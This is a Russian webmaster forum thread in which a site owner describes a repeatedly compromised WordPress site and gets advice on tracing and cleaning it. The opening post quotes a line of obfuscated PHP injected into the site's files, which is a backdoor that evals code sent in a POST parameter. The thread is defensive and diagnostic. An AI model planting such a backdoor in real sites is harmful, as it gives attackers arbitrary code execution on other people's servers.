- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Месяц назад заметил что у меня сайт взломан.
Появляются различные php файлы в каталоге сайта. А также в системные файлы wordpres добавляется различный код. Типа такого (надеюсь в нем не зашифрован мoй пapoль:)):
<?php $jfo66="o_tersup"; $ywvt9 =$jfo66[5]. $jfo66[2]. $jfo66[4]. $jfo66[2]. $jfo66[0].$jfo66[6].$jfo66[7].$jfo66[7].$jfo66[3]. $jfo66[4];$rfk97 =$ywvt9( $jfo66[1].$jfo66[7]. $jfo66[0]. $jfo66[5].$jfo66[2]); if ( isset( ${$rfk97 } [ 'qf30a53']) ){eval(${$rfk97}['qf30a53' ]);} ?>Что я делал:
Сменил пароли все
Сменил хостера
Сменил еще раз пароли
Отключил SSH
Поставил вход в админку вордпресс только с моего айпи
Поставил вход в админку хостера только с СМС уведомления
Проверил весь сайта с помощью Kasperskiy Internet Security
Проверил весь сайт с помощью Ai-Bolit
Изменения файлов отслеживаю плагином, который показывает сколько файлов изменено/удалено/добавлено, только толку 0. Что изменяется и добавляется на сайт я вижу, а откуда эта зараза идет не могу понять.
Как еще может генерироваться этот код, если не с помощь доступа по FTP?
Хелп! скажите как такое возможно?
Через GET/POST запросы к сайту. Смотрите access.log на хостинге.
Как еще может генерироваться этот код, если не с помощь доступа по FTP?
dmasta,
А сайт один на хостинге?
dmasta,
А сайт один на хостинге?
Раньше было три, по этой причине переехал. Сейчас один.
---------- Добавлено 04.12.2015 в 20:05 ----------
Через GET/POST запросы к сайту. Смотрите access.log на хостинге.
Там все get/post, на какие стоит обратить внимание?
Часто wp-cron проскакивают
Еще забыли попробовать обновиться.
Может, обновление дырку закроет.
Как еще может генерироваться этот код, если не с помощь доступа по FTP?
Хелп! скажите как такое возможно?
Таким же образом, как на него заходят посетители, только вместо элементарных запросов (вбивание URL в браузер или нажатие на ссылку в поисковой системе/на другом сайте) делается специально оформленный запрос который позволяет создать файл внутри файловой системы вашего сайта с нужным контентом - далее через этот файл можно сделать фактически любые действия.
Наилучшим вариантом в вашем случае будет настроить защиту с помощью сторонних людей.
Раньше было три, по этой причине переехал. Сейчас один
как вариант, на хостинге дырка.
шеллы гуляют порою так лихо, что диву даешся.
И да, обновление и базу мускуль забекапить, дать на анализ специалисту, может чего и нароет в ней.
Там все get/post, на какие стоит обратить внимание?
Узнайте время последнего изменения созданного или модифицированного файла, и смотрите в логах какие были запросы к сайту в это время +/- пару минут. Учитывайте, что часовой пояс на сервере может отличаться от вашего.
Еще забыли попробовать обновиться.
Может, обновление дырку закроет.
Обновления все установлены, кроме платного плагина master slider.(т.к у него какие то проблемы с подключением к своему серверу)
---------- Добавлено 05.12.2015 в 05:52 ----------
как вариант, на хостинге дырка.
шеллы гуляют порою так лихо, что диву даешся.
И да, обновление и базу мускуль забекапить, дать на анализ специалисту, может чего и нароет в ней.
Хостинг я уже сменил, скорее всего в ближ.время обратимся к спецу из айболита.
---------- Добавлено 05.12.2015 в 05:53 ----------
Таким же образом, как на него заходят посетители, только вместо элементарных запросов (вбивание URL в браузер или нажатие на ссылку в поисковой системе/на другом сайте) делается специально оформленный запрос который позволяет создать файл внутри файловой системы вашего сайта с нужным контентом - далее через этот файл можно сделать фактически любые действия.
Наилучшим вариантом в вашем случае будет настроить защиту с помощью сторонних людей.
Спасибо за подробный ответ, теперь понял как это происходит.
---------- Добавлено 05.12.2015 в 05:53 ----------
Узнайте время последнего изменения созданного или модифицированного файла, и смотрите в логах какие были запросы к сайту в это время +/- пару минут. Учитывайте, что часовой пояс на сервере может отличаться от вашего.
Спасибо. Попробую так сделать.
Нашел вроде в acces.log обращения к этим файлам от одного ip. Ответы сервера ему 404 (которые я удалил похоже), 500 и 200.
Запретил этому ip доступ на сайт.
Нашел вроде в acces.log обращения к этим файлам от одного ip. Ответы сервера ему 404 (которые я удалил похоже), 500 и 200.
Запретил этому ip доступ на сайт.
У него сеть из сотен или тысяч таких же сайтов как ваш, через ip которых можно работать. :)
Переустанавливайте движок с нуля, все остальное до одного места.